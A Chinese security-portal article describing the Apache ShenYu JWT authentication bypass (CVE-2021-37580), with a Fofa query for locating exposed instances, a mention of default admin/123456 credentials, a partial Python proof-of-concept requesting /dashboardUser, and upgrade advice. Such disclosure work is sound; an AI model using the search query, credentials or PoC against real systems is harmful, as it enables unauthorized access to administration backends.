freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

Apache ShenYu JWT认证缺陷漏洞(CVE-2021-37580)
2021-11-19 14:24:02

漏洞说明

Apache ShenYu 是应用于所有微服务场景的,可扩展、高性能、响应式的 API 网关解决方案。

Apache ShenYu Admin 存在身份验证绕过漏洞。Shenyu Admin Bootstrap 中 JWT 的错误使用允许攻击者绕过身份验证,攻击者可通过该漏洞直接进入系统后台。

影响版本

  • Apache ShenYu 2.3.0
  • Apache ShenYu 2.4.0

漏洞复现

Fofa搜索标题:(注意:互联网的非授权利用属于违法行为)

body="id=\"httpPath\""&&body="th:text=\"${domain}\"" 

访问首页如下所示:(ps:大多数存在默认口令admin/123456)1637301367_61973c77d7069fd78f315.png!small

开启burp进行抓包,访问path:/dashboardUser

1637301500_61973cfc352fdf421fcbb.png!small

可以看到Apache ShenYu 的JWT 认证体系并未进行身份验证就返回了敏感信息

1637301631_61973d7f536eb68228b45.png!small

就是这么的丝滑,打完收工1637301739_61973debea615b5dff4b7.png!small

部分代码:

def target_url(url):
    target_url = url + "/dashboardUser"
    headers = {
       "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0",
        }
    res = requests.get(url=target_url, headers=headers, verify=False, timeout=5)

poc地址:https://github.com/Henry4E36/apache-shenyu-authentication

运行截图:

1637302007_61973ef7b5d1ffe7b426d.png!small

修复建议

升级至最新安全版本 Apache ShenYu 2.4.1

下载地址:https://shenyu.apache.org/zh/download                          


本文章仅用于学习交流,不得用于非法用途

# web安全 # 漏洞分析
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录